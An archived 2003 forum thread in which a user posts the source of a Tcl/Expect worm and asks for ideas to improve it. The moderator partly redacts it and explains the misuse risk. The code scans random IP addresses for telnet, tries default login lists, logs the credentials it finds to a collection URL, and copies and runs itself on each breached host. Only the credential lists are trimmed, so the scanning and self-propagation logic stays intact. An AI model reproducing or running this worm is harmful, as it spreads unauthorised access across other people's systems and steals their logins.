Training, Open Source computer languages
PerlPHPPythonMySQLApache / TomcatTclRubyJavaC and C++LinuxCSS 
Search for:
Home Accessibility Courses Diary The Mouth Forum Resources Site Map About Us Contact
TclWorm

Posted by sirius_black (sirius_black), 12 December 2003
Hi !!
Here is a worm in coded in Tcl/Expect.
It's the first version.
It's looking for box with default password and save the ip/login/password in a database (accessed by a php script)
If you have some ideas to improve it...


Code:
#!/usr/bin/expect
# tclworm v1.0
# by sirius_black
# http://membres.lycos.fr/lotfree

if {[fork]!=0} exit
disconnect

set wget_found 0
set telnet_found 0
set wget_path ""
set telnet_path ""

set liste_telnet {
   "" ""
   admin 1234
   admin admin
*** Chunk of information removed here for security reasons ***
   test test
   User ""
   write "private"
   write synnet
}

set liste_cisco {
   "" ""
   admin admin
   admin "default"
*** Chunk of code removed here for security reasons ***   
   ripeop ""
   root attack
}

proc get_random_ip {} {
   set tcl_precision 3
   set ip ""
   append ip [expr round((rand()*1000)/4)]
   for {set i 0} {$i < 3} {incr i 1} {
     append ip "."
     append ip [expr round((rand()*1000)/4)]
   }
   return $ip
}

proc is_telnet_open ip {
   set is_open 0
   if { [catch {set sock [socket $ip 23]} ] } {
     set is_open 0
   } else {
     set is_open 1
     close $sock
   }
   return $is_open
}

proc where_are_progs {} {
   global wget_found
   global telnet_found
   global wget_path
   global telnet_path
   if [file exists "/usr/bin/wget"]==1 {
     set wget_found 1
     set wget_path "/usr/bin/wget"
   }
   if [file exists "/usr/bin/telnet"]==1 {
     set telnet_found 1
     set telnet_path "/usr/bin/telnet"
   }
}

proc whereis_worm {} {
   set worm_path [pwd]
   set file_name [lindex [split [info script] "/"] end]
   append worm_path "/" $file_name
   return $worm_path
}

proc get_content {} {
   set f [open [whereis_worm] "r"]
   set texte ""
   while { ![eof $f] } {
     set ligne [gets $f]
     set ligne [string map {\\ \\\\ \$ \\\$ \` \\\`} $ligne]
     set ligne [string trim $ligne]
     append texte "$ligne\n"
   }
   close $f
   return $texte
}

proc MyIpaddr {} {
   set addr ""
   if {[catch {dns address [info hostname]} addr]} {
       set server [socket -server # 0]
     set port [lindex [fconfigure $server -sockname] 2]
     set host [lindex [fconfigure $server -sockname] 1]
     set client [socket $host $port]
       set addr [lindex [fconfigure $client -sockname] 0]
       close $client
       close $server
   }
   return $addr
}

proc MyNet {} {
   set net ""
   regexp {(.*)\..*} [MyIpaddr] {} net
   return $net
}

proc declare_becane {ip login password} {
   set lheaders "Connection close"
   if {![llength [info commands "::http::geturl"]]} {
     if {[catch {package require http}]} {
         return "zut"
     }
   }
   ::http::config -useragent "TCLWORM v1.0 (LOTFREE)"
   set htmlUrl "http://localhost:3128/wormstat.php?ip=$ip&login=$login&pass=$password"
   if { [catch { ::http::geturl $htmlUrl} token]} {
     return "zut"
   }
   if { [::http::status $token] != "ok"} {
     return "zut"
   }
   set htmlFile [::http::data $token]
   if { [regexp "haxored" $htmlFile] == 1 } {
     return "next"
   }
   return "go"
}

where_are_progs

set ip ""
while {1==1} {
   set ip [get_random_ip]
   if { [regexp "^127" $ip] == 1 } {
     continue
   }
   if { ![is_telnet_open $ip] } {
     continue
   } else {
     if {$telnet_found == 1} {
         #on utilise telnet
         foreach {login passwd} $liste_telnet {
           spawn -noecho $telnet_path $ip 23
           expect {
               "ogin:" { send "$login\n" }
               "user:" { send "$login\n" }
               "imeout" { continue }
               "ailure" { continue }
               "nknow host" { continue }
               "o route to host" { continue }
               "o adresse associated with name" { continue }
           }
           expect {
               "incorrect" { continue }
               "ssword:" { send "$passwd\n" }
           }
           expect {
               "ast login:" {
                 if { [declare_becane $ip $login $passwd] == "next" } {
                 send "logout\nexit\n"
                     continue
                 } else {
                     exec sleep 2
                     send "cat > tclworm << EOF\n"
                     expect ">"
                     send [get_content]
                     expect ">"
                     send "EOF\n"
                     expect "$"
                     send "chmod +x tclworm\n"
                     expect "$"
                     send "./tclworm\n"
                     expect "$"
                     send "logout\nexit\n"
                     break
                 }
               }
           }
         }
     }
     # fin de on utilise telnet

   }
}


This post was modified to remove data which could help malicious users run the program against networks where they are not authorised to do so.  See follow up post for my fuller explanantion - Graham

Posted by admin (Graham Ellis), 13 December 2003
Hmmm

Expect is a great tool for automated testing which is exaclty what you're using it for ...

Programs such as the one that you have posted are valuable in the right hands - they allow (let us say) a system administrator to check the security of his own network against breakins.  But in the wrong hands, such programs provide tools for the unauthorised visitor to find weaknesses and attempt breakins. Posting up complete code for a "worm" such as this is similar to posting up someone else's password in that it lessens their security and for this reason I am modifying your post to remove some of the data (not-Tcl) elements of the code.   That way, it remains available for discussion of the Tcl issues, but doesn't provide anyone who happens to find it with a breaking-in tool!

Graham (Wearing his moderator's hat!)

Posted by sirius_black (sirius_black), 15 December 2003
yes I understand.
The reason I made it was only to understand how a worm works.
I don't want the worm to delete file or crash systems. I only use it to see statistics of propagation ...
It was very interestant (does this word exist in english ?) to code it and I want to share the source with others programmers

Posted by admin (Graham Ellis), 15 December 2003
I'm 100% happy with posting / sharing code - I just modified it slightly so that this board doesn't become a place for people to get hold of code that could easily be misused.  



This page is a thread posted to the opentalk forum at www.opentalk.org.uk and archived here for reference. To jump to the archive index please follow this link.

You can Add a comment or ranking to this page

© WELL HOUSE CONSULTANTS LTD., 2014: Well House Manor • 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • FAX: 01144 1225 899360 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho